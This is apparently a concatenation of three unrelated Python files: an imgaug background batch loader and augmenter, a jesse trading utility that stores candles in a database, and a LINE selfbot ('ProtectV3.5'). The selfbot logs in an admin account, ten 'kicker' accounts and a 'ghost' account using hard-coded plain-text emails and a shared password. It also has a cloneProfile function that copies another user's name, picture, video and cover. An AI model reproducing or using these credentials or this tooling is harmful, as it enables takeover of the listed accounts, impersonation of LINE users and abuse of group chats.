        # Set by terminate() to ask workers to stop early.
        self.join_signal = multiprocessing.Event()
        # One "I'm done" event per worker; see all_finished().
        self.finished_signals = []
        self.workers = []
        self.threaded = threaded
        # Per-worker RNG seeds. Only used for process workers; thread workers
        # share the parent's RNG state and receive seedval=None below.
        seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
        for i in range(nb_workers):
            finished_signal = multiprocessing.Event()
            self.finished_signals.append(finished_signal)
            if threaded:
                worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
            else:
                worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
            # Daemonic so a crashed main process doesn't leave workers behind.
            worker.daemon = True
            worker.start()
            self.workers.append(worker)

    def all_finished(self):
        """
        Determine whether the workers have finished the loading process.
        Returns
        -------
        out : bool
            True if all workers have finished. Else False.
        """
        return all([event.is_set() for event in self.finished_signals])

    def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
        # Worker loop: pull batches from the generator and pickle them into
        # the shared queue until exhausted or the join signal is set.
        if seedval is not None:
            random.seed(seedval)
            np.random.seed(seedval)
            # imgaug's own module-level RNG.
            seed(seedval)
        for batch in load_batch_func():
            do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
            # protocol=-1 selects the highest available pickle protocol.
            queue.put(pickle.dumps(batch, protocol=-1))
            if join_signal.is_set():
                break
        finished_signal.set()

    def terminate(self):
        """
        Stop all workers.
        """
        self.join_signal.set()
        if self.threaded:
            # Threads cannot be force-killed; wait for them to notice the signal.
            for worker in self.workers:
                worker.join()
        else:
            # Processes are terminated hard; mark their signals so
            # all_finished() still reports completion.
            for worker, finished_signal in zip(self.workers, self.finished_signals):
                worker.terminate()
                finished_signal.set()
class BackgroundAugmenter(object):
    """
    Class to augment batches in the background (while training on the GPU).
    This is a wrapper around the multiprocessing module.
    Parameters
    ----------
    batch_loader : BatchLoader
        BatchLoader object to load data in the
        background.
    augseq : Augmenter
        An augmenter to apply to all loaded images.
        This may be e.g. a Sequential to apply multiple augmenters.
    queue_size : int
        Size of the queue that is used to temporarily save the augmentation
        results. Larger values offer the background processes more room
        to save results when the main process doesn't load much, i.e. they
        can lead to smoother and faster training. For large images, high
        values can block a lot of RAM though.
    nb_workers : "auto" or int
        Number of background workers to spawn. If auto, it will be set
        to C-1, where C is the number of CPU cores.
    """
    def __init__(self, batch_loader, augseq, queue_size=50, nb_workers="auto"):
        do_assert(queue_size > 0)
        self.augseq = augseq
        # Shared with the BatchLoader: its output queue is our input queue.
        self.source_finished_signals = batch_loader.finished_signals
        self.queue_source = batch_loader.queue
        self.queue_result = multiprocessing.Queue(queue_size)
        if nb_workers == "auto":
            try:
                nb_workers = multiprocessing.cpu_count()
            except (ImportError, NotImplementedError):
                nb_workers = 1
            # try to reserve at least one core for the main process
            nb_workers = max(1, nb_workers - 1)
        else:
            do_assert(nb_workers >= 1)
        #print("Starting %d background processes" % (nb_workers,))
        self.nb_workers = nb_workers
        self.workers = []
        # Counts workers that sent their end-of-stream sentinel (None).
        self.nb_workers_finished = 0
        # Toggles read by the workers to decide what to augment per batch.
        self.augment_images = True
        self.augment_keypoints = True
        # One deterministic seed per worker process.
        seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
        for i in range(nb_workers):
            worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
            worker.daemon = True
            worker.start()
            self.workers.append(worker)

    def get_batch(self):
        """
        Returns a batch from the queue of augmented batches.
        If workers are still running and there are no batches in the queue,
        it will automatically wait for the next batch.
        Returns
        -------
        out : None or ia.Batch
            One batch or None if all workers have finished.
        """
        batch_str = self.queue_result.get()
        batch = pickle.loads(batch_str)
        if batch is not None:
            return batch
        else:
            # A pickled None is each worker's end-of-stream sentinel.
            self.nb_workers_finished += 1
            if self.nb_workers_finished == self.nb_workers:
                return None
            else:
                # Some workers are still alive; recurse to wait for them.
                return self.get_batch()

    def _augment_images_worker(self, augseq, queue_source, queue_result, source_finished_signals, seedval):
        """
        Worker function that endlessly queries the source queue (input
        batches), augments batches in it and sends the result to the output
        queue.
        """
        # Seed every RNG involved so worker output is reproducible.
        np.random.seed(seedval)
        random.seed(seedval)
        augseq.reseed(seedval)
        seed(seedval)
        while True:
            # wait for a new batch in the source queue and load it
            try:
                batch_str = queue_source.get(timeout=0.1)
                batch = pickle.loads(batch_str)
                # augment the batch
                batch_augment_images = batch.images is not None and self.augment_images
                batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
                if batch_augment_images and batch_augment_keypoints:
                    # Use one deterministic augmenter so images and keypoints
                    # receive identical random transformations.
                    augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
                    batch.images_aug = augseq_det.augment_images(batch.images)
                    batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
                elif batch_augment_images:
                    batch.images_aug = augseq.augment_images(batch.images)
                elif batch_augment_keypoints:
                    batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
                # send augmented batch to output queue
                batch_str = pickle.dumps(batch, protocol=-1)
                queue_result.put(batch_str)
            except QueueEmpty:
                # Source queue drained; exit only once every loader worker
                # reported completion, and leave a None sentinel behind.
                if all([signal.is_set() for signal in source_finished_signals]):
                    queue_result.put(pickle.dumps(None, protocol=-1))
                    return

    def terminate(self):
        """
        Terminates all background processes immediately.
        This will also free their RAM.
        """
        for worker in self.workers:
            worker.terminate()
|
utils.py | import threading
import numpy as np
import jesse.helpers as jh
from jesse.models.Candle import Candle
from jesse.models.CompletedTrade import CompletedTrade
from jesse.models.DailyBalance import DailyBalance
from jesse.models.Order import Order
from jesse.models.Orderbook import Orderbook
from jesse.models.Ticker import Ticker
from jesse.models.Trade import Trade
from jesse.services import logger
def store_candle_into_db(exchange: str, symbol: str, candle: np.ndarray) -> None:
    """Persist one candle row, then echo it to stdout.

    The insert runs on a fire-and-forget thread so the caller is never
    blocked by database latency; duplicate rows are silently skipped via
    ``on_conflict_ignore``.
    """
    # NOTE(review): the index mapping assumes a candle layout of
    # [timestamp, open, close, high, low, volume] -- confirm against the
    # producer of `candle`.
    d = {
        'id': jh.generate_unique_id(),
        'symbol': symbol,
        'exchange': exchange,
        'timestamp': candle[0],
        'open': candle[1],
        'high': candle[3],
        'low': candle[4],
        'close': candle[2],
        'volume': candle[5]
    }
    def async_save() -> None:
        Candle.insert(**d).on_conflict_ignore().execute()
        print(
            jh.color(
                f"candle: {jh.timestamp_to_time(d['timestamp'])}-{exchange}-{symbol}: {candle}",
                'blue'
            )
        )
    # async call
    threading.Thread(target=async_save).start()
def store_ticker_into_db(exchange: str, symbol: str, ticker: np.ndarray) -> None:
    """Persist one ticker row (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- everything below is dead
    # code kept for when ticker persistence is re-enabled.
    return
    d = {
        'id': jh.generate_unique_id(),
        'timestamp': ticker[0],
        'last_price': ticker[1],
        'high_price': ticker[2],
        'low_price': ticker[3],
        'volume': ticker[4],
        'symbol': symbol,
        'exchange': exchange,
    }
    def async_save() -> None:
        Ticker.insert(**d).on_conflict_ignore().execute()
        print(
            jh.color(f'ticker: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: {ticker}', 'yellow')
        )
    # async call
    threading.Thread(target=async_save).start()
def store_completed_trade_into_db(completed_trade: CompletedTrade) -> None:
    """Persist a completed trade record (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- dead code retained below.
    return
    d = {
        'id': completed_trade.id,
        'strategy_name': completed_trade.strategy_name,
        'symbol': completed_trade.symbol,
        'exchange': completed_trade.exchange,
        'type': completed_trade.type,
        'timeframe': completed_trade.timeframe,
        'entry_price': completed_trade.entry_price,
        'exit_price': completed_trade.exit_price,
        'take_profit_at': completed_trade.take_profit_at,
        'stop_loss_at': completed_trade.stop_loss_at,
        'qty': completed_trade.qty,
        'opened_at': completed_trade.opened_at,
        'closed_at': completed_trade.closed_at,
        'entry_candle_timestamp': completed_trade.entry_candle_timestamp,
        'exit_candle_timestamp': completed_trade.exit_candle_timestamp,
        'leverage': completed_trade.leverage,
    }
    def async_save() -> None:
        CompletedTrade.insert(**d).execute()
        if jh.is_debugging():
            logger.info(f'Stored the completed trade record for {completed_trade.exchange}-{completed_trade.symbol}-{completed_trade.strategy_name} into database.')
    # async call
    threading.Thread(target=async_save).start()
def store_order_into_db(order: Order) -> None:
    """Persist an executed order record (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- dead code retained below.
    return
    d = {
        'id': order.id,
        'trade_id': order.trade_id,
        'exchange_id': order.exchange_id,
        'vars': order.vars,
        'symbol': order.symbol,
        'exchange': order.exchange,
        'side': order.side,
        'type': order.type,
        'flag': order.flag,
        'qty': order.qty,
        'price': order.price,
        'status': order.status,
        'created_at': order.created_at,
        'executed_at': order.executed_at,
        'canceled_at': order.canceled_at,
        'role': order.role,
    }
    def async_save() -> None:
        Order.insert(**d).execute()
        if jh.is_debugging():
            logger.info(f'Stored the executed order record for {order.exchange}-{order.symbol} into database.')
    # async call
    threading.Thread(target=async_save).start()
def store_daily_balance_into_db(daily_balance: dict) -> None:
    """Persist a daily portfolio balance record (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- dead code retained below.
    return
    def async_save():
        DailyBalance.insert(**daily_balance).execute()
        if jh.is_debugging():
            logger.info(f'Stored daily portfolio balance record into the database: {daily_balance["asset"]} => {jh.format_currency(round(daily_balance["balance"], 2))}'
            )
    # async call
    threading.Thread(target=async_save).start()
def store_trade_into_db(exchange: str, symbol: str, trade: np.ndarray) -> None:
    """Persist one aggregated trade row (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- dead code retained below.
    return
    d = {
        'id': jh.generate_unique_id(),
        'timestamp': trade[0],
        'price': trade[1],
        'buy_qty': trade[2],
        'sell_qty': trade[3],
        'buy_count': trade[4],
        'sell_count': trade[5],
        'symbol': symbol,
        'exchange': exchange,
    }
    def async_save() -> None:
        Trade.insert(**d).on_conflict_ignore().execute()
        print(
            jh.color(
                f'trade: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: {trade}',
                'green'
            )
        )
    # async call
    threading.Thread(target=async_save).start()
def store_orderbook_into_db(exchange: str, symbol: str, orderbook: np.ndarray) -> None:
    """Persist an orderbook snapshot (currently disabled)."""
    # NOTE(review): deliberately short-circuited -- dead code retained below.
    return
    d = {
        'id': jh.generate_unique_id(),
        'timestamp': jh.now_to_timestamp(),
        # The full book is serialized as a binary blob.
        'data': orderbook.dumps(),
        'symbol': symbol,
        'exchange': exchange,
    }
    def async_save() -> None:
        Orderbook.insert(**d).on_conflict_ignore().execute()
        print(
            jh.color(
                f'orderbook: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: [{orderbook[0][0][0]}, {orderbook[0][0][1]}], [{orderbook[1][0][0]}, {orderbook[1][0][1]}]',
                'magenta'
            )
        )
    # async call
    threading.Thread(target=async_save).start()
def fetch_candles_from_db(exchange: str, symbol: str, start_date: int, finish_date: int) -> tuple:
    """Load candles for *exchange*/*symbol* whose timestamps fall inside
    [start_date, finish_date], ordered oldest-first.

    Returns a tuple of (timestamp, open, close, high, low, volume) tuples.
    """
    query = Candle.select(
        Candle.timestamp, Candle.open, Candle.close, Candle.high, Candle.low,
        Candle.volume
    ).where(
        Candle.timestamp.between(start_date, finish_date),
        Candle.exchange == exchange,
        Candle.symbol == symbol
    ).order_by(Candle.timestamp.asc())
    return tuple(query.tuples())
|
53moo.py | # -*- coding: utf-8 -*-
'''
© 2018SelfBot ProtectV3.5
'''
from important import *
# --- Command-line interface -------------------------------------------------
# Setup Argparse
parser = argparse.ArgumentParser(description='© 2018SelfBot ProtectV3.5')
parser.add_argument('-t', '--token', type=str, metavar='', required=False, help='Token | Example : Exxxx')
parser.add_argument('-e', '--email', type=str, default='', metavar='', required=False, help='Email Address | Example : example@xxx.xx')
parser.add_argument('-p', '--passwd', type=str, default='', metavar='', required=False, help='Password | Example : xxxx')
parser.add_argument('-a', '--appName', type=str, default='', metavar='', required=False, choices=list(ApplicationType._NAMES_TO_VALUES), help='Application Type | Example : CHROMEOS')
parser.add_argument('-s', '--systemname', type=str, default='', metavar='', required=False, help='System Name | Example : Chrome_OS')
parser.add_argument('-c', '--channelid', type=str, default='', metavar='', required=False, help='Channel ID | Example : 1341209950')
parser.add_argument('-T', '--traceback', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Using Traceback | Use : True/False')
parser.add_argument('-S', '--showqr', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Show QR | Use : True/False')
args = parser.parse_args()
# --- Account logins ---------------------------------------------------------
# SECURITY NOTE(review): account credentials are hard-coded in plain text
# below. They should be moved to a config file or environment variables
# (the argparse options above are never used for login).
# Login line
start_runtime = datetime.now()
line = LINE("smoottew008@gmail.com","avios111",appType="WIN10")
print ("===============[ADMIN LOGIN]===============\n")
kicker = LINE("rdn05495@ebbob.com","avios111",appType="WIN10")
print ("===============[Kicker 1 LOGIN SUKSES]===============\n")
kicker2 = LINE("smootte12@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 2 LOGIN SUKSES]===============\n")
kicker3 = LINE("smoottew21@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 3 LOGIN SUKSES]===============\n")
kicker4 = LINE("smoottew11@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 4 LOGIN SUKSES]===============\n")
kicker5 = LINE("smoottew12@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 5 LOGIN SUKSES]===============\n")
kicker6 = LINE("smoottew13@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 6 LOGIN SUKSES ]===============\n")
kicker7 = LINE("smoottew14@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 7 LOGIN SUKSES]===============\n")
kicker8 = LINE("smootte11@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 8 LOGIN SUKSES]===============\n")
kicker9 = LINE("ohx74581@cndps.com","avios111",appType="WIN10")
print ("===============[Kicker 9 LOGIN SUKSES]===============\n")
kicker10 = LINE("smoottew20@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 10 LOGIN SUKSES]===============\n")
g1 = LINE("dpf16683@cndps.com","avios111",appType="WIN10")
print ("===============[Ghost LOGIN SUKSES]===============\n")
# --- Identity / permission lists --------------------------------------------
client = line
myMid = line.profile.mid
creator = ["uabeb419b286e211b3716ce5062dc19d0"]  # main account mid
owner = ["uabeb419b286e211b3716ce5062dc19d0"]  # main account mid
admin = ["uabeb419b286e211b3716ce5062dc19d0"]  # main account mid
staff = ["uabeb419b286e211b3716ce5062dc19d0"]  # main account mid
Amid = kicker.getProfile().mid
Bmid = kicker2.getProfile().mid
Cmid = kicker3.getProfile().mid
Dmid = kicker4.getProfile().mid
Emid = kicker5.getProfile().mid
Fmid = kicker6.getProfile().mid
Gmid = kicker7.getProfile().mid
Hmid = kicker8.getProfile().mid
Imid = kicker9.getProfile().mid
Jmid = kicker10.getProfile().mid
# NOTE(review): kicker3 appears twice and kicker4 is missing in KAC, ABC and
# botlist below -- looks like a copy/paste typo; kept as-is to preserve behavior.
KAC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
ABC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
Bots = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
#Autoadd
armylist = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
botlist = [line,kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
#Autoadd
Ariff = creator + admin + owner + staff + Bots
# --- Runtime state ----------------------------------------------------------
programStart = time.time()
oepoll = OEPoll(line)
tmp_text = []
lurking = {}
protectqr = []
protectkick = []
protecARoin = []
protectinvite = []
protectcancel = []
protectcanceljs = []
protectantijs = []
ghost = []
numlist= {}
zxcvzx = myMid
# Load persisted protection lists / settings from JSON files on disk.
with open('protectcancel.json', 'r') as fp:
    protectcancel = json.load(fp)
with open('protectcanceljs.json', 'r') as fp:
    protectcanceljs = json.load(fp)
with open('protectantijs.json', 'r') as fp:
    protectantijs = json.load(fp)
with open('ghost.json', 'r') as fp:
    ghost = json.load(fp)
with open('protectinvite.json', 'r') as fp:
    protectinvite = json.load(fp)
Setbot3 = codecs.open("wait.json","r","utf-8")  # NOTE(review): handle never closed
wait = json.load(Setbot3)
settings = livejson.File('setting.json', True, False, 4)
numlist= {}  # NOTE(review): duplicate definition (already initialized above)
bool_dict = {
    True: ['Yes', 'Active', 'Success', 'Open', 'On'],
    False: ['No', 'Not Active', 'Failed', 'Close', 'Off']
}
##### ADD BOT #####
# Make every bot account add every other bot as a contact (best effort;
# failures are ignored on purpose).
for bottt in botlist:
    for bott in armylist:
        try:
            bottt.findAndAddContactsByMid(bott)
        except:
            pass
responsename1 = kicker.getProfile().displayName
responsename2 = kicker2.getProfile().displayName
responsename3 = kicker3.getProfile().displayName
responsename4 = kicker4.getProfile().displayName
responsename5 = kicker5.getProfile().displayName
responsename6 = kicker6.getProfile().displayName
responsename7 = kicker7.getProfile().displayName
responsename8 = kicker8.getProfile().displayName
responsename9 = kicker9.getProfile().displayName
responsename10 = kicker10.getProfile().displayName
# Backup profile
profile = line.getContact(myMid)
settings["myProfile"]["displayName"] = profile.displayName
settings["myProfile"]["statusMessage"] = profile.statusMessage
settings["myProfile"]["pictureStatus"] = profile.pictureStatus
cont = line.getContact(myMid)
settings["myProfile"]["videoProfile"] = cont.videoProfile
coverId = line.getProfileDetail()["result"]["objectId"]
settings["myProfile"]["coverId"] = coverId
# Check Json Data
def delete_log():
    """Drop entries older than one day from the global message log.

    Fixes from review of the original:
    - iterate over a snapshot (deleting from a dict while iterating it
      raises RuntimeError),
    - delete the current key (the original used `msg_id`, an undefined name),
    - avoid `datetime.timedelta`: in this module `datetime` is the class
      (see `datetime.now()` at startup), which has no `timedelta` attribute.
    """
    one_day_seconds = 86400
    for msg_id in list(msg_dict):
        created = cTime_to_datetime(msg_dict[msg_id]["createdTime"])
        # Strictly older than 24h, matching the original `> timedelta(1)` intent.
        if (datetime.utcnow() - created).total_seconds() > one_day_seconds:
            del msg_dict[msg_id]
def restartProgram():
    """Replace the current process with a fresh interpreter running the
    same script and arguments (in-place restart; never returns)."""
    print ('##----- PROGRAM RESTARTED -----##')
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def logError(error, write=True):
    """Record *error*: optionally dump its traceback to tmp/errors/<id>.txt,
    append a summary line to errorLog.txt, and echo it to the console.

    A random 3-digit id ties the errorLog.txt line to the traceback file.
    """
    errid = str(random.randint(100, 999))
    # NOTE(review): assumes the tmp/errors/ directory already exists.
    filee = open('tmp/errors/%s.txt'%errid, 'w') if write else None
    # `args.traceback` is the -T CLI flag: also print the traceback to console.
    if args.traceback: traceback.print_tb(error.__traceback__)
    if write:
        traceback.print_tb(error.__traceback__, file=filee)
        filee.close()
    with open('errorLog.txt', 'a') as e:
        e.write('\n%s : %s'%(errid, str(error)))
    print ('++ Error : {error}'.format(error=error))
def command(text):
    """Normalize *text* into a lower-cased command string.

    When the set-key prefix is enabled in settings, the prefix is stripped
    (all occurrences are replaced, matching the original behavior); text
    without the prefix yields the sentinel 'Undefined command'.
    """
    lowered = text.lower()
    if not settings['setKey']['status']:
        return lowered
    prefix = settings['setKey']['key']
    if lowered.startswith(prefix):
        return lowered.replace(prefix, '')
    return 'Undefined command'
def changeVideoAndPictureProfile(pict, vids):
    """Upload *vids* as the LINE video profile, then set *pict* as the
    profile picture.

    Returns a human-readable status string; wraps and re-raises any
    failure as a generic Exception.
    """
    try:
        # Fix: open the video inside `with` so the handle is always closed
        # (the original leaked the file object, even on success).
        with open(vids, 'rb') as vid_file:
            files = {'file': vid_file}
            obs_params = line.genOBSParams({'oid': myMid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
            data = {'params': obs_params}
            r_vp = line.server.postContent('{}/talk/vp/upload.nhn'.format(str(line.server.LINE_OBS_DOMAIN)), data=data, files=files)
        if r_vp.status_code != 201:
            return "Failed update profile"
        line.updateProfilePicture(pict, 'vp')
        return "Success update profile"
    except Exception as e:
        raise Exception("Error change video and picture profile {}".format(str(e)))
def genImageB64(path):
    """Read the file at *path* and return its base64 encoding as text."""
    with open(path, 'rb') as img_file:
        raw = img_file.read()
    return base64.b64encode(raw).decode('utf-8')
def genUrlB64(url):
    """Return the base64 encoding (UTF-8) of *url* as a text string."""
    encoded = base64.b64encode(url.encode('utf-8'))
    return encoded.decode('utf-8')
def removeCmd(text, key=''):
    """Strip the set-key prefix and the first word (the command) from *text*,
    returning only the argument part.

    When *key* is '' the prefix is looked up from the global settings;
    otherwise *key* is used directly.
    """
    if key == '':
        setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
    else:
        setKey = key
    remainder = text[len(setKey):]
    first_word = remainder.split(' ')[0]
    # Drop "<command> " (command plus one space); yields '' when there
    # are no arguments, same as the original slicing.
    return remainder[len(first_word) + 1:]
def multiCommand(cmd, list_cmd=()):
    """Return True if *cmd* starts with any prefix in *list_cmd*, else False.

    Fixes from review: `any()` with a generator replaces the original
    `True in [ ...list comprehension... ]` (short-circuits, no temp list),
    and the mutable default `[]` becomes an immutable tuple. Callers are
    unaffected: same name, same parameters, same boolean result.
    """
    return any(cmd.startswith(c) for c in list_cmd)
def replaceAll(text, dic):
    """Apply every old->new replacement in *dic* to *text*, sequentially.

    Note: replacements are applied in dict iteration order, so a later
    pair can rewrite the output of an earlier one.

    Fix from review: the original guarded `dic.items()` with a bare
    `except:` falling back to Python 2's `dic.iteritems()`; this file is
    Python 3 (it uses f-strings), so that branch was dead and the bare
    except could mask real errors.
    """
    for old, new in dic.items():
        text = text.replace(old, new)
    return text
# NOTE(review): shadows the builtin help(); renaming would break callers.
def help():
    """Return the user help text from help.txt, with the {key} placeholder
    filled by the current command prefix (title-cased; empty when the
    set-key is disabled)."""
    key = '' if not settings['setKey']['status'] else settings['setKey']['key']
    with open('help.txt', 'r') as f:
        text = f.read()
    helpMsg = text.format(key=key.title())
    return helpMsg
def helpbot():
    """Return the contents of helpbot.txt (passed through str.format with
    no arguments, so literal braces in the file would raise)."""
    with open('helpbot.txt', 'r') as fh:
        template = fh.read()
    return template.format()
def parsingRes(res):
    """Re-frame a multi-line response into the box-drawing layout.

    Lines that do not already start with a box character get a '│ '
    gutter; box-framed lines are kept, with the first line emitted
    without a leading newline.
    """
    lines = res.split('\n')
    first = lines[0]
    pieces = []
    for ln in lines:
        if ln.startswith(('╭', '├', '│', '╰')):
            # Quirk preserved from the original: the "first line" check is
            # by value, so any later line equal to the first is also
            # emitted without a leading newline.
            pieces.append(ln if ln == first else '\n' + ln)
        else:
            pieces.append('\n│ ' + ln)
    return ''.join(pieces)
def sendMentionxd(to, mid, firstmessage, lastmessage):
    """Send "<firstmessage> @mention <lastmessage>" to chat *to* through the
    admin `line` client, tagging the user *mid*.

    On any failure the error text is reported back into the same chat.
    """
    try:
        text = "%s " % (str(firstmessage))
        mention = "@x "
        # S/E are the string offsets of the "@x" placeholder inside `text`.
        span = {'S': str(len(text)), 'E': str(len(text) + len(mention) - 1), 'M': mid}
        text += mention + str(lastmessage)
        line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps([span]) + '}')}, 0)
    except Exception as error:
        line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def Musik(to):
    """Send a LINE MUSIC share message (contentType 19) to chat *to*,
    styled with the bot's own display name, avatar and status message."""
    # NOTE(review): the track/link ids below are hard-coded to one specific
    # song; the sender fields come from the bot's own profile.
    contentMetadata = {
        'previewUrl': "http://dl.profile.line-cdn.net/"+line.getContact(myMid).picturePath,
        'i-installUrl': 'http://itunes.apple.com/app/linemusic/id966142320',
        'type': 'mt',
        'subText': line.getContact(myMid).statusMessage if line.getContact(myMid).statusMessage != '' else 'creator By rat |ID LINE|\njamekillover',
        'a-installUrl': 'market://details?id=jp.linecorp.linemusic.android',
        'a-packageName': 'jp.linecorp.linemusic.android',
        'countryCode': 'JP',
        'a-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1',
        'i-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1',
        'text': line.getContact(myMid).displayName,
        'id': 'mt000000000d69e2db',
        'linkUri': 'https://music.me.me/launch?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1',
        'MSG_SENDER_ICON': "https://os.me.naver.jp/os/p/"+myMid,
        'MSG_SENDER_NAME': line.getContact(myMid).displayName,
    }
    return line.sendMessage(to, line.getContact(myMid).displayName, contentMetadata, 19)
def _send_mention(client, to, mid, firstmessage, lastmessage):
    """Send "<firstmessage> @mention <lastmessage>" to chat *to* via *client*,
    tagging the user *mid*.

    Builds the LINE MENTIONEES metadata for a single "@x " placeholder
    inserted between the two message parts. On any failure the error text
    is reported back into the same chat through the same client.
    """
    try:
        text = "%s " % (str(firstmessage))
        mention = "@x "
        # S/E are the string offsets of the "@x" placeholder inside `text`.
        arrData = {'S': str(len(text)), 'E': str(len(text) + len(mention) - 1), 'M': mid}
        text += mention + str(lastmessage)
        client.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps([arrData]) + '}')}, 0)
    except Exception as error:
        client.sendMessage(to, "[ INFO ] Error :\n" + str(error))

# Fix from review: sendMention1..sendMention20 were twenty byte-identical
# copies differing only in the kicker client used; consolidated into the
# shared helper above plus thin wrappers that keep the original public names.
# The kicker globals are resolved at call time (late binding), so
# sendMention11..sendMention20 -- whose kicker11..kicker20 clients are never
# defined in this file -- still raise NameError when called, as before.
def sendMention1(to, mid, firstmessage, lastmessage):
    _send_mention(kicker, to, mid, firstmessage, lastmessage)
def sendMention2(to, mid, firstmessage, lastmessage):
    _send_mention(kicker2, to, mid, firstmessage, lastmessage)
def sendMention3(to, mid, firstmessage, lastmessage):
    _send_mention(kicker3, to, mid, firstmessage, lastmessage)
def sendMention4(to, mid, firstmessage, lastmessage):
    _send_mention(kicker4, to, mid, firstmessage, lastmessage)
def sendMention5(to, mid, firstmessage, lastmessage):
    _send_mention(kicker5, to, mid, firstmessage, lastmessage)
def sendMention6(to, mid, firstmessage, lastmessage):
    _send_mention(kicker6, to, mid, firstmessage, lastmessage)
def sendMention7(to, mid, firstmessage, lastmessage):
    _send_mention(kicker7, to, mid, firstmessage, lastmessage)
def sendMention8(to, mid, firstmessage, lastmessage):
    _send_mention(kicker8, to, mid, firstmessage, lastmessage)
def sendMention9(to, mid, firstmessage, lastmessage):
    _send_mention(kicker9, to, mid, firstmessage, lastmessage)
def sendMention10(to, mid, firstmessage, lastmessage):
    _send_mention(kicker10, to, mid, firstmessage, lastmessage)
def sendMention11(to, mid, firstmessage, lastmessage):
    _send_mention(kicker11, to, mid, firstmessage, lastmessage)
def sendMention12(to, mid, firstmessage, lastmessage):
    _send_mention(kicker12, to, mid, firstmessage, lastmessage)
def sendMention13(to, mid, firstmessage, lastmessage):
    _send_mention(kicker13, to, mid, firstmessage, lastmessage)
def sendMention14(to, mid, firstmessage, lastmessage):
    _send_mention(kicker14, to, mid, firstmessage, lastmessage)
def sendMention15(to, mid, firstmessage, lastmessage):
    _send_mention(kicker15, to, mid, firstmessage, lastmessage)
def sendMention16(to, mid, firstmessage, lastmessage):
    _send_mention(kicker16, to, mid, firstmessage, lastmessage)
def sendMention17(to, mid, firstmessage, lastmessage):
    _send_mention(kicker17, to, mid, firstmessage, lastmessage)
def sendMention18(to, mid, firstmessage, lastmessage):
    _send_mention(kicker18, to, mid, firstmessage, lastmessage)
def sendMention19(to, mid, firstmessage, lastmessage):
    _send_mention(kicker19, to, mid, firstmessage, lastmessage)
def sendMention20(to, mid, firstmessage, lastmessage):
    _send_mention(kicker20, to, mid, firstmessage, lastmessage)
def cloneProfile(myMid):
    """Copy another user's LINE profile onto this account.

    ``myMid`` is the mid of the user to clone (despite the name, it is the
    *target's* mid).  Copies display name, status message, picture/video
    profile and cover.  Relies on the module-level ``line`` client and the
    ``changeVideoAndPictureProfile`` helper defined elsewhere in the file.
    """
    contact = line.getContact(myMid)
    if contact.videoProfile == None:
        # No video profile: a single server-side clone call suffices.
        line.cloneContactProfilev2(myMid)
    else:
        # Video profile present: copy the pieces manually.
        profile = line.getProfile()
        profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
        line.updateProfile(profile)
        # Download the target's picture and its "/vp" video variant,
        # then upload both onto this account.
        pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
        vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
        changeVideoAndPictureProfile(pict, vids)
    # Point this account's cover at the target's cover object id.
    coverId = line.getProfileDetail(myMid)['result']['objectId']
    line.updateProfileCoverById(coverId)
def backupProfile():
    """Snapshot the bot's own profile into the global ``settings`` dict.

    Saves display name, picture, status message, video profile and cover
    object id under ``settings['myProfile']`` so restoreProfile() can put
    them back later.  Reads the module-level ``line`` client and ``myMid``.
    """
    profile = line.getContact(myMid)
    settings['myProfile']['displayName'] = profile.displayName
    settings['myProfile']['pictureStatus'] = profile.pictureStatus
    settings['myProfile']['statusMessage'] = profile.statusMessage
